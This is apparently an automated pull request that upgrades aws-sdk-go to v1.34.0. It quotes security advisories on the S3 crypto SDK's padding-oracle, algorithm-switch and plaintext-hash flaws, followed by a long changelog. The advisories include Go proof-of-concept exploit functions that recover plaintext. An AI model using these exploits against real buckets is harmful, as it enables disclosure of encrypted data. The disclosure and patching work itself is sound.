Update module github.com/aws/aws-sdk-go to v1.34.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
github.com/aws/aws-sdk-go	v1.25.34 -> v1.34.0

GitHub Vulnerability Alerts

CVE-2020-8912

Summary

The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the GCM option was chosen as content cipher.

Risk/Severity

The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.

V1 prior to 1.34.0 of the S3 crypto SDK does not authenticate the algorithm parameters for the data encryption key.

An attacker with write access to the bucket can use this in order to change the encryption algorithm of an object in the bucket, which can lead to problems depending on the supported algorithms. For example, a switch from AES-GCM to AES-CTR in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation.

By default, the only available algorithms in the SDK are AES-GCM and AES-CBC. Switching the algorithm from AES-GCM to AES-CBC can be used as way to reconstruct the plaintext through an oracle endpoint revealing decryption failures, by brute forcing 16 byte chunks of the plaintext. Note that the plaintext needs to have some known structure for this to work, as a uniform random 16 byte string would be the same as a 128 bit encryption key, which is considered cryptographically safe.

The attack works by taking a 16 byte AES-GCM encrypted block guessing 16 bytes of plaintext, constructing forgery that pretends to be PKCS5 padded AES-CBC, using the ciphertext and the plaintext guess and that will decrypt to a valid message if the guess was correct.

To understand this attack, we have to take a closer look at both AES-GCM and AES-CBC:
AES-GCM encrypts using a variant of CTR mode, i.e. C_i = AES-Enc(CB_i) ^ M_i. AES-CBC on the other hand decrypts via M_i = AES-Dec(C_i) ^ C_{i-1}, where C_{-1} = IV. The padding oracle can tell us if, after switching to CBC mode, the plaintext recovered is padded with a valid PKCS5 padding.

Since AES-Dec(C_i ^ M_i) = CB_i, if we set IV' = CB_i ^ 0x10*[16], where 0x10*[16] is the byte 0x10 repeated 16 times, and C_0' = C_i ^ M_i' the resulting one block message (IV', C_0') will have valid PKCS5 padding if our guess M_i' for M_i was correct, since the decrypted message consists of 16 bytes of value 0x10, the PKCS5 padded empty string.

Note however, that an incorrect guess might also result in a valid padding, if the AES decryption result randomly happens to end in 0x01, 0x0202, or a longer valid padding. In order to ensure that the guess was indeed correct, a second check using IV'' = IV' ^ (0x00*[15] || 0x11) with the same ciphertext block has to be performed. This will decrypt to 15 bytes of value 0x10 and one byte of value 0x01 if our initial guess was correct, producing a valid padding. On an incorrect guess, this second ciphertext forgery will have an invalid padding with a probability of 1:2^128, as one can easily see.

This issue is fixed in V2 of the API, by using the KMS+context key wrapping scheme for new files, authenticating the algorithm. Old files encrypted with the KMS key wrapping scheme remain vulnerable until they are reencrypted with the new scheme.

Mitigation

Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with GCM mode and use the KMS key wrapping option.

Proof of concept

A Proof of concept is available in a separate github repository.

This particular issue is described in combined_oracle_exploit.go:

func CombinedOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {
	data, header, err := input.S3Mock.GetObjectDirect(bucket, key)
	if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/GCM/NoPadding" {
		return "", fmt.Errorf("Algorithm is %q, not GCM!", alg)
	}
	gcmIv, err := base64.StdEncoding.DecodeString(header.Get("X-Amz-Meta-X-Amz-Iv"))
	if len(gcmIv) != 12 {
		return "", fmt.Errorf("GCM IV is %d bytes, not 12", len(gcmIv))
	}
	fullIv := make([]byte, 16)
	confirmIv := make([]byte, 16)
	for i := 0; i < 12; i++ {
		fullIv[i] = gcmIv[i] ^ 0x10
		confirmIv[i] = gcmIv[i] ^ 0x10
	}
        // Set i to the block we want to attempt to decrypt
	counter := i + 2
	for j := 15; j >= 12; j-- {
		v := byte(counter % 256)
		fullIv[j] = 0x10 ^ v
		confirmIv[j] = 0x10 ^ v
		counter /= 256
	}
	confirmIv[15] ^= 0x11
	fullIvEnc := base64.StdEncoding.EncodeToString(fullIv)
	confirmIvEnc := base64.StdEncoding.EncodeToString(confirmIv)
	success := false
        // Set plaintextGuess to the guess for the plaintext of this block
	newData := []byte(plaintextGuess)
	for j := 0; j < 16; j++ {
		newData[j] ^= data[16*i+j]
	}
	newHeader := header.Clone()
	newHeader.Set("X-Amz-Meta-X-Amz-Cek-Alg", "AES/CBC/PKCS5Padding")
	newHeader.Set("X-Amz-Meta-X-Amz-Iv", fullIvEnc)
	newHeader.Set("X-Amz-Meta-X-Amz-Unencrypted-Content-Length", "16")
	input.S3Mock.PutObjectDirect(bucket, key+"guess", newData, newHeader)
	if input.Oracle(bucket, key+"guess") {
		newHeader.Set("X-Amz-Meta-X-Amz-Iv", confirmIvEnc)
		input.S3Mock.PutObjectDirect(bucket, key+"guess", newData, newHeader)
		if input.Oracle(bucket, key+"guess") {
			return plaintextGuess, nil
		}
	}
	return "", fmt.Errorf("Block %d could not be decrypted", i)
}

CVE-2020-8911

Summary

The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher.

Risk/Severity

The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.

V1 prior to 1.34.0 of the S3 crypto SDK, allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912.

This exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) 128*length(plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors.

This issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM.

Mitigation

Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode.

Proof of concept

A Proof of concept is available in a separate github repository.

This particular issue is described in padding_oracle_exploit.go:

func PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {
	data, header, err := input.S3Mock.GetObjectDirect(bucket, key)
	if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/CBC/PKCS5Padding" {
		return "", fmt.Errorf("Algorithm is %q, not CBC!", alg)
	}
	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
	padding := byte(len(data) - length)
	plaintext := make([]byte, length)
	for i := length - 1; i >= 0; i-- {
		newLength := 16 * (i/16 + 1)
		dataCopy := make([]byte, newLength)
		headerCopy := header.Clone()
		copy(dataCopy, data)
		// Set Padding
		newPadding := byte(newLength - i)
		for j := i + 1; j < newLength; j++ {
			var oldValue byte
			if j >= length {
				oldValue = padding
			} else {
				oldValue = plaintext[j]
			}
			dataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy)
			if err != nil {
				return "", err
			}
		}
		// Guess
		for c := 0; c < 256; c++ {
			dataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
			input.S3Mock.PutObjectDirect(bucket, key+"guess", dataCopy, headerCopy)
			if input.Oracle(bucket, key+"guess") {
				plaintext[i] = byte(c)
				break
			}
			dataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
		}
	}
	return string(plaintext), nil
}

GHSA-76wf-9vgp-pj7w

Summary

The golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.

Specific Go Packages Affected

github.com/aws/aws-sdk-go/service/s3/s3crypto

Risk/Severity

The vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

The issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.

The S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.

The issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.

Mitigation

The header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.

Proof of concept

A Proof of concept is available in a separate github repository, this particular issue can be found at here:

func HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {
	_, header, err := input.S3Mock.GetObjectDirect(bucket, key)
	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
	plaintextMd5 := header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Md5")
	blocks := length / 16
	possiblePlaintextNum := 1
	segNum := len(input.PossiblePlaintextSegments)
	for i := 0; i < blocks; i++ {
		possiblePlaintextNum *= segNum
	}
	for i := 0; i < possiblePlaintextNum; i++ {
		w := i
		guess := ""
		for j := 0; j < blocks; j++ {
			guess += input.PossiblePlaintextSegments[w%segNum]
			w /= segNum
		}
		guessMd5 := md5.Sum([]byte(guess))
		if plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {
			return guess, nil
		}
	}
	return "", fmt.Errorf("No plaintext found!")
}

The PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.

CVE-2022-2582

The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext, if the hash is readable to the attacker. AWS now blocks this metadata field, but older SDK versions still send it.

---

Release Notes

aws/aws-sdk-go (github.com/aws/aws-sdk-go)

v1.34.0

Compare Source

===

Service Client Updates

• service/glue: Updates service API and documentation
  • AWS Glue now adds support for Network connection type enabling you to access resources inside your VPC using Glue crawlers and Glue ETL jobs.
• service/organizations: Updates service API and documentation
  • Documentation updates for some new error reasons.
• service/s3: Updates service documentation and examples
  • Updates Amazon S3 API reference documentation.
• service/sms: Updates service API and documentation
  • In this release, AWS Server Migration Service (SMS) has added new features: 1. APIs to work with application and instance level validation 2. Import application catalog from AWS Application Discovery Service 3. For an application you can start on-demand replication

SDK Features

• service/s3/s3crypto: Updates to the Amazon S3 Encryption Client - This change includes fixes for issues that were reported by Sophie Schmieg from the Google ISE team, and for issues that were discovered by AWS Cryptography.

v1.33.21

Compare Source

===

Service Client Updates

• service/ec2: Updates service API, documentation, and paginators
  • This release supports Wavelength resources, including carrier gateways, and carrier IP addresses.
• service/lex-models: Updates service API and documentation
• service/personalize: Updates service API and documentation
• service/personalize-events: Updates service API and documentation
• service/personalize-runtime: Updates service API and documentation
• service/runtime.lex: Updates service API and documentation

v1.33.20

Compare Source

===

Service Client Updates

• service/appsync: Updates service API and documentation
• service/fsx: Updates service documentation
• service/resourcegroupstaggingapi: Updates service documentation
  • Documentation updates for the Resource Group Tagging API namespace.
• service/sns: Updates service documentation
  • Documentation updates for SNS.
• service/transcribe: Updates service API, documentation, and paginators

v1.33.19

Compare Source

===

Service Client Updates

• service/health: Updates service documentation
  • Documentation updates for health

v1.33.18

Compare Source

===

Service Client Updates

• service/ssm: Updates service waiters and paginators
  • Adds a waiter for CommandExecuted and paginators for various other APIs.

v1.33.17

Compare Source

===

Service Client Updates

• service/chime: Updates service API
  • This release increases the CreateMeetingWithAttendee max attendee limit to 10.
• service/personalize-runtime: Updates service API and documentation
• service/resourcegroupstaggingapi: Updates service API and documentation
  • Updates to the list of services supported by this API.
• service/storagegateway: Updates service API and documentation
  • Add support for gateway VM deprecation dates
• service/wafv2: Updates service API and documentation

v1.33.16

Compare Source

===

Service Client Updates

• service/cloudfront: Updates service documentation
  • Documentation updates for CloudFront
• service/codebuild: Updates service API, documentation, and paginators
  • Adding support for BuildBatch, and CodeCoverage APIs. BuildBatch allows you to model your project environment in source, and helps start multiple builds with a single API call. CodeCoverage allows you to track your code coverage using AWS CodeBuild.
• service/ec2: Updates service API
  • EC2 On-Demand Capacity Reservations now adds support to bring your own licenses (BYOL) of Windows operating system to launch EC2 instances.
• service/guardduty: Updates service API, documentation, and paginators
  • GuardDuty can now provide detailed cost metrics broken down by account, data source, and S3 resources, based on the past 30 days of usage. This new feature also supports viewing cost metrics for all member accounts as a GuardDuty master.
• service/kafka: Updates service API and documentation
• service/organizations: Updates service documentation
  • Documentation updates for AWS Organizations
• service/resource-groups: Updates service documentation
• service/servicecatalog: Updates service API and documentation
  • This release adds support for ProvisionProduct, UpdateProvisionedProduct & DescribeProvisioningParameters by product name, provisioning artifact name and path name. In addition DescribeProvisioningParameters now returns a list of provisioning artifact outputs.
• service/sesv2: Updates service API, documentation, and paginators

v1.33.15

Compare Source

===

Service Client Updates

• service/ec2: Updates service API, documentation, and paginators
  • Adding support to target EC2 On-Demand Capacity Reservations within an AWS Resource Group to launch EC2 instances.
• service/ecr: Updates service API and documentation
  • This release adds support for encrypting the contents of your Amazon ECR repository with customer master keys (CMKs) stored in AWS Key Management Service.
• service/firehose: Updates service API and documentation
  • This release includes a new Kinesis Data Firehose feature that supports data delivery to Https endpoint and to partners. You can now use Kinesis Data Firehose to ingest real-time data and deliver to Https endpoint and partners in a serverless, reliable, and salable manner.
• service/guardduty: Updates service API and documentation
  • GuardDuty now supports S3 Data Events as a configurable data source type. This feature expands GuardDuty's monitoring scope to include S3 data plane operations, such as GetObject and PutObject. This data source is optional and can be enabled or disabled at anytime. Accounts already using GuardDuty must first enable the new feature to use it; new accounts will be enabled by default. GuardDuty masters can configure this data source for individual member accounts and GuardDuty masters associated through AWS Organizations can automatically enable the data source in member accounts.
• service/resource-groups: Updates service API and documentation
• service/servicediscovery: Updates service documentation

v1.33.14

Compare Source

===

Service Client Updates

• service/autoscaling: Updates service API and documentation
  • Now you can enable Instance Metadata Service Version 2 (IMDSv2) or disable the instance metadata endpoint with Launch Configurations.
• service/ec2: Updates service API and documentation
  • Introduces support for tag-on-create capability for the following APIs: CreateVpnConnection, CreateVpnGateway, and CreateCustomerGateway. A user can now add tags while creating these resources. For further detail, please see AWS Tagging Strategies.
• service/imagebuilder: Updates service API and documentation
• service/ivs: Updates service API and documentation
• service/medialive: Updates service API and documentation
  • AWS Elemental MediaLive now supports several new features: EBU-TT-D captions in Microsoft Smooth outputs; interlaced video in HEVC outputs; video noise reduction (using temporal filtering) in HEVC outputs.
• service/rds: Updates service documentation
  • Adds reporting of manual cluster snapshot quota to DescribeAccountAttributes API
• service/securityhub: Updates service API and documentation

v1.33.13

Compare Source

===

Service Client Updates

• service/datasync: Updates service API and documentation
• service/dms: Updates service API, documentation, and paginators
  • Basic endpoint settings for relational databases, Preflight validation API.
• service/ec2: Updates service API
  • m6gd, c6gd, r6gd instances are powered by AWS Graviton2 processors and support local NVMe instance storage
• service/frauddetector: Updates service API and documentation
• service/glue: Updates service API and documentation
  • Add ability to manually resume workflows in AWS Glue providing customers further control over the orchestration of ETL workloads.
• service/ssm: Updates service documentation
  • Assorted doc ticket-fix updates for Systems Manager.

v1.33.12

Compare Source

===

Service Client Updates

• service/frauddetector: Updates service API and documentation
• service/fsx: Updates service documentation
• service/kendra: Updates service API and documentation
  • Amazon Kendra now supports sorting query results based on document attributes. Amazon Kendra also introduced an option to enclose table and column names with double quotes for database data sources.
• service/macie2: Updates service API and documentation
• service/mediaconnect: Updates service API and documentation
• service/mediapackage: Updates service API and documentation
  • The release adds daterange as a new ad marker option. This option enables MediaPackage to insert EXT-X-DATERANGE tags in HLS and CMAF manifests. The EXT-X-DATERANGE tag is used to signal ad and program transition events.
• service/monitoring: Updates service API and documentation
  • AWS CloudWatch ListMetrics now supports an optional parameter (RecentlyActive) to filter results by only metrics that have received new datapoints in the past 3 hours. This enables more targeted metric data retrieval through the Get APIs
• service/mq: Updates service API, documentation, and paginators
  • Amazon MQ now supports LDAP (Lightweight Directory Access Protocol), providing authentication and authorization of Amazon MQ users via a customer designated LDAP server.
• service/sagemaker: Updates service API, documentation, and paginators
  • Sagemaker Ground Truth:Added support for OIDC (OpenID Connect) to authenticate workers via their own identity provider instead of through Amazon Cognito. This release adds new APIs (CreateWorkforce, DeleteWorkforce, and ListWorkforces) to SageMaker Ground Truth service. Sagemaker Neo: Added support for detailed target device description by using TargetPlatform fields - OS, architecture, and accelerator. Added support for additional compilation parameters by using JSON field CompilerOptions. Sagemaker Search: SageMaker Search supports transform job details in trial components.

SDK Bugs

• service/s3/s3crypto: Fix client's temporary file buffer error on retry (#​3344)
  • Fixes the Crypto client's temporary file buffer cleanup returning an error when the request is retried.

v1.33.11

Compare Source

===

Service Client Updates

• service/config: Updates service API and documentation
• service/directconnect: Updates service documentation
  • Documentation updates for AWS Direct Connect
• service/fsx: Updates service API and documentation
• service/glue: Updates service API and documentation
  • Added new ConnectionProperties: "KAFKA_SSL_ENABLED" (to toggle SSL connections) and "KAFKA_CUSTOM_CERT" (import CA certificate file)
• service/lightsail: Updates service API and documentation
  • This release adds support for Amazon Lightsail content delivery network (CDN) distributions and SSL/TLS certificates.
• service/workspaces: Updates service API and documentation
  • Added UpdateWorkspaceImagePermission API to share Amazon WorkSpaces images across AWS accounts.

v1.33.10

Compare Source

===

Service Client Updates

• service/medialive: Updates service API and documentation
  • The AWS Elemental MediaLive APIs and SDKs now support the ability to get thumbnails for MediaLive devices that are attached or not attached to a channel. Previously, this thumbnail feature was available only on the console.
• service/quicksight: Updates service API, documentation, and paginators
  • New API operations - GetSessionEmbedUrl, CreateNamespace, DescribeNamespace, ListNamespaces, DeleteNamespace, DescribeAccountSettings, UpdateAccountSettings, CreateAccountCustomization, DescribeAccountCustomization, UpdateAccountCustomization, DeleteAccountCustomization. Modified API operations to support custom permissions restrictions - RegisterUser, UpdateUser, UpdateDashboardPermissions

SDK Enhancements

• example/aws/request/httptrace: Update example with more metrics (#​3436)
  • Updates the tracing example to include additional metrics such as SDKs request handlers, and support multiple request attempts.

v1.33.9

Compare Source

===

Service Client Updates

• service/codeguruprofiler: Updates service API and documentation

v1.33.8

Compare Source

===

Service Client Updates

• service/cloudfront: Adds new service
  • CloudFront adds support for cache policies and origin request policies. With these new policies, you can now more granularly control the query string, header, and cookie values that are included in the cache key and in requests that CloudFront sends to your origin.
• service/codebuild: Updates service API and documentation
  • AWS CodeBuild adds support for Session Manager and Windows 2019 Environment type
• service/ec2: Updates service API and documentation
  • Added support for tag-on-create for CreateVpcPeeringConnection and CreateRouteTable. You can now specify tags when creating any of these resources. For more information about tagging, see AWS Tagging Strategies. Add poolArn to the response of DescribeCoipPools.
• service/fms: Updates service API and documentation
• service/frauddetector: Updates service API, documentation, and paginators
• service/groundstation: Updates service API and documentation
• service/rds: Updates service API and documentation
  • Add a new SupportsParallelQuery output field to DescribeDBEngineVersions. This field shows whether the engine version supports parallelquery. Add a new SupportsGlobalDatabases output field to DescribeDBEngineVersions and DescribeOrderableDBInstanceOptions. This field shows whether global database is supported by engine version or the combination of engine version and instance class.

v1.33.7

Compare Source

===

Service Client Updates

• service/application-autoscaling: Updates service documentation
• service/appsync: Updates service documentation
• service/connect: Updates service API and documentation
• service/ec2: Updates service API and documentation
  • Documentation updates for EC2
• service/elasticbeanstalk: Updates service waiters and paginators
  • Add waiters for EnvironmentExists, EnvironmentUpdated, and EnvironmentTerminated. Add paginators for DescribeEnvironmentManagedActionHistory and ListPlatformVersions.
• service/macie2: Updates service API, documentation, and paginators

SDK Enhancements

• service/s3/s3manager: Clarify documentation and behavior of GetBucketRegion (#​3428)
  • Updates the documentation for GetBucketRegion's behavior with regard to default configuration for path style addressing. Provides examples how to override this behavior.
  • Updates the GetBucketRegion utility to not require a region hint when the session or client was configured with a custom endpoint URL.
  • Related to #​3115
• service/s3: Add failsafe handling for unknown stream messages
  • Adds failsafe handling for receiving unknown stream messages from an API. A <streamName>UnknownEvent type will encapsulate the unknown message received from the API. Where <streamName> is the name of the API's stream, (e.g. S3's SelectObjectContentEventStreamUnknownEvent).

v1.33.6

Compare Source

===

Service Client Updates

• service/ivs: Adds new service

SDK Enhancements

• service/s3/s3crypto: Allow envelope unmarshal to accept JSON numbers for tag length (#​3422)

v1.33.5

Compare Source

===

Service Client Updates

• service/alexaforbusiness: Updates service API and documentation
• service/amplify: Updates service documentation
• service/appmesh: Updates service API, documentation, and paginators
• service/cloudhsmv2: Updates service documentation
  • Documentation updates for cloudhsmv2
• service/comprehend: Updates service API and documentation
• service/ebs: Updates service API and documentation
• service/eventbridge: Updates service API and documentation
• service/events: Updates service API and documentation
  • Amazon CloudWatch Events/EventBridge adds support for API Gateway as a target.
• service/sagemaker: Updates service API and documentation
  • This release adds the DeleteHumanTaskUi API to Amazon Augmented AI
• service/secretsmanager: Updates service API, documentation, and examples
  • Adds support for filters on the ListSecrets API to allow filtering results by name, tag key, tag value, or description. Adds support for the BlockPublicPolicy option on the PutResourcePolicy API to block resource policies which grant a wide range of IAM principals access to secrets. Adds support for the ValidateResourcePolicy API to validate resource policies for syntax and prevent lockout error scenarios and wide access to secrets.
• service/sns: Updates service documentation
  • This release adds support for SMS origination number as an attribute in the MessageAttributes parameter for the SNS Publish API.
• service/wafv2: Updates service API and documentation

v1.33.4

Compare Source

===

Service Client Updates

• service/ce: Updates service API and documentation
• service/ec2: Updates service API and documentation
  • EC2 Spot now enables customers to tag their Spot Instances Requests on creation.
• service/forecast: Updates service API and documentation
• service/organizations: Updates service API and documentation
  • We have launched a self-service option to make it easier for customers to manage the use of their content by AI services. Certain AI services (Amazon CodeGuru Profiler, Amazon Comprehend, Amazon Lex, Amazon Polly, Amazon Rekognition, Amazon Textract, Amazon Transcribe, and Amazon Translate) may use content to improve the service. Customers have been able to opt out of this use by contacting AWS Support, and now they can opt out on a self-service basis by setting an Organizations policy for all or an individual AI service listed above. Please refer to the technical documentation in the online AWS Organizations User Guide for more details.

v1.33.3

Compare Source

===

Service Client Updates

• service/cloudfront: Updates service API and documentation
  • Amazon CloudFront adds support for a new security policy, TLSv1.2_2019.
• service/ec2: Updates service API and documentation
  • DescribeAvailabilityZones now returns additional data about Availability Zones and Local Zones.
• service/elasticfilesystem: Updates service API, documentation, and examples
  • This release adds support for automatic backups of Amazon EFS file systems to further simplify backup management.
• service/glue: Updates service API and documentation
  • AWS Glue Data Catalog supports cross account sharing of tables through AWS Lake Formation
• service/lakeformation: Updates service API and documentation
• service/storagegateway: Updates service API and documentation
  • Adding support for file-system driven directory refresh, Case Sensitivity toggle for SMB File Shares, and S3 Prefixes and custom File Share names

v1.33.2

Compare Source

===

Service Client Updates

• service/ec2: Updates service API, documentation, and paginators
  • This release supports Wavelength resources, including carrier gateways, and carrier IP addresses.
• service/lex-models: Updates service API and documentation
• service/personalize: Updates service API and documentation
• service/personalize-events: Updates service API and documentation
• service/personalize-runtime: Updates service API and documentation
• service/runtime.lex: Updates service API and documentation

v1.33.1

Compare Source

===

Service Client Updates

• service/health: Updates service documentation
  • Documentation updates for health

v1.33.0

Compare Source

===

Service Client Updates

• service/appsync: Updates service API and documentation
• service/chime: Updates service API and documentation
  • This release supports third party emergency call routing configuration for Amazon Chime Voice Connectors.
• service/codebuild: Updates service API and documentation
  • Support build status config in project source
• service/imagebuilder: Updates service API and documentation
• service/rds: Updates service API
  • This release adds the exceptions KMSKeyNotAccessibleFault and InvalidDBClusterStateFault to the Amazon RDS ModifyDBInstance API.
• service/securityhub: Updates service API and documentation

SDK Features

• service/s3/s3crypto: Introduces EncryptionClientV2 and DecryptionClientV2 encryption and decryption clients which support a new key wrapping algorithm kms+context. (#​3403)
  • DecryptionClientV2 maintains the ability to decrypt objects encrypted using the EncryptionClient.
  • Please see s3crypto documentation for migration details.

v1.32.13

Compare Source

===

Service Client Updates

• service/codeguru-reviewer: Updates service API and documentation
• service/comprehendmedical: Updates service API
• service/ec2: Updates service API and documentation
  • Added support for tag-on-create for CreateVpc, CreateEgressOnlyInternetGateway, CreateSecurityGroup, CreateSubnet, CreateNetworkInterface, CreateNetworkAcl, CreateDhcpOptions and CreateInternetGateway. You can now specify tags when creating any of these resources. For more information about tagging, see AWS Tagging Strategies.
• service/ecr: Updates service API and documentation
  • Add a new parameter (ImageDigest) and a new exception (ImageDigestDoesNotMatchException) to PutImage API to support pushing image by digest.
• service/rds: Updates service documentation
  • Documentation updates for rds

v1.32.12

Compare Source

===

Service Client Updates

• service/autoscaling: Updates service documentation and examples
  • Documentation updates for Amazon EC2 Auto Scaling.
• service/codeguruprofiler: Updates service API, documentation, and paginators
• service/codestar-connections: Updates service API, documentation, and paginators
• service/ec2: Updates service API, documentation, and paginators
  • Virtual Private Cloud (VPC) customers can now create and manage their own Prefix Lists to simplify VPC configurations.

v1.32.11

Compare Source

===

Service Client Updates

• service/cloudformation: Updates service API and documentation
  • ListStackInstances and DescribeStackInstance now return a new StackInstanceStatus object that contains DetailedStatus values: a disambiguation of the more generic Status value. ListStackInstances output can now be filtered on DetailedStatus using the new Filters parameter.
• service/cognito-idp: Updates service API
• service/dms: Updates service documentation
  • This release contains miscellaneous API documentation updates for AWS DMS in response to several customer reported issues.
• service/quicksight: Updates service API and documentation
  • Added support for cross-region DataSource credentials copying.
• service/sagemaker: Updates service API and documentation
  • The new 'ModelClientConfig' parameter being added for CreateTransformJob and DescribeTransformJob api actions enable customers to configure model invocation related parameters such as timeout and retry.

v1.32.10

Compare Source

===

Service Client Updates

• service/ec2: Updates service API and documentation
  • Added support for tag-on-create for Host Reservations in Dedicated Hosts. You can now specify tags when you create a Host Reservation for a Dedicated Host. For more information about tagging, see AWS Tagging Strategies.
• service/glue: Updates service API and documentation
  • This release adds new APIs to support column level statistics in AWS Glue Data Catalog

v1.32.9

Compare Source

===

Service Client Updates

• service/amplify: Updates service API and documentation
• service/autoscaling: Updates service documentation
  • Documentation updates for Amazon EC2 Auto Scaling.
• service/backup: Updates service API and documentation
• service/codecommit: Updates service API, documentation, and paginators
  • This release introduces support for reactions to CodeCommit comments. Users will be able to select from a pre-defined list of emojis to express their reaction to any comments.
• service/elasticmapreduce: Updates service API and documentation
  • Amazon EMR customers can now set allocation strategies for On-Demand and Spot instances in their EMR clusters with instance fleets. These allocation strategies use real-time capacity insights to provision clusters faster and make the most efficient use of available spare capacity to allocate Spot instances to reduce interruptions.
• service/fsx: Updates service API and documentation
• service/honeycode: Adds new service
• service/iam: Updates service documentation
  • Documentation updates for iam
• service/organizations: Updates service API and documentation
  • This release adds support for a new backup policy type for AWS Organizations.

v1.32.8

Compare Source

===

Service Client Updates

• service/mediatailor: Updates service API and documentation
• service/organizations: Updates service API and documentation
  • Added a new error message to support the requirement for a Business License on AWS accounts in China to create an organization.

v1.32.7

Compare Source

===

Service Client Updates

• service/ec2: Updates service API and documentation
  • This release adds Tag On Create feature support for the ImportImage, ImportSnapshot, ExportImage and CreateInstanceExportTask APIs.
• service/elasticmapreduce: Updates service API and documentation
  • Adding support for MaximumCoreCapacityUnits parameter for EMR Managed Scaling. It allows users to control how many units/nodes are added to the CORE group/fleet. Remaining units/nodes are added to the TASK groups/fleet in the cluster.
• service/rds: Updates service documentation and paginators
  • Added paginators for various APIs.
• service/rekognition: Updates service API, documentation, and paginators
  • This update adds the ability to detect black frames, end credits, shots, and color bars in stored videos
• service/sqs: Updates service API, documentation, and paginators
  • AWS SQS adds pagination support for ListQueues and ListDeadLetterSourceQueues APIs

v1.32.6

Compare Source

===

Service Client Updates

• service/ec2: Updates service API
  • Adds support to tag elastic-gpu on the RunInstances api
• service/elasticache: Updates service documentation
  • Documentation updates for elasticache
• service/medialive: Updates service API and documentation
  • AWS Elemental MediaLive now supports Input Prepare schedule actions. This feature improves existing input switching by allowing users to prepare an input prior to switching to it.
• service/opsworkscm: Updates service API and documentation
  • Documentation updates for AWS OpsWorks CM.

v1.32.5

Compare Source

===

Service Client Updates

• service/mediaconvert: Updates service API and documentation
  • AWS Elemental MediaConvert SDK has added support for NexGuard FileMarker SDK, which allows NexGuard partners to watermark proprietary content in mezzanine and OTT streaming contexts.
• service/meteringmarketplace: Updates service documentation
  • Documentation updates for meteringmarketplace
• service/rds: Updates service API and documentation
  • Adding support for global write forwarding on secondary clusters in an Aurora global database.
• service/route53: Updates service API and documentation
  • Added a new ListHostedZonesByVPC API for customers to list all the private hosted zones that a specified VPC is associated with.
• service/sesv2: Updates service API and documentation
• service/ssm: Updates service API and documentation
  • Added offset support for specifying the number of days to wait after the date and time specified by a CRON expression before running the maintenance window.
• service/support: Updates service documentation
  • Documentation updates for support

v1.32.4

Compare Source

===

Service Client Updates

• service/appmesh: Updates service API and documentation
• service/ec2: Updates service API and documentation
  • nvmeSupport added to DescribeInstanceTypes API
• service/macie2: Updates service documentation
• service/route53: Updates service API
  • Add PriorRequestNotComplete exception to AssociateVPCWithHostedZone API
• service/snowball: Updates service API and documentation
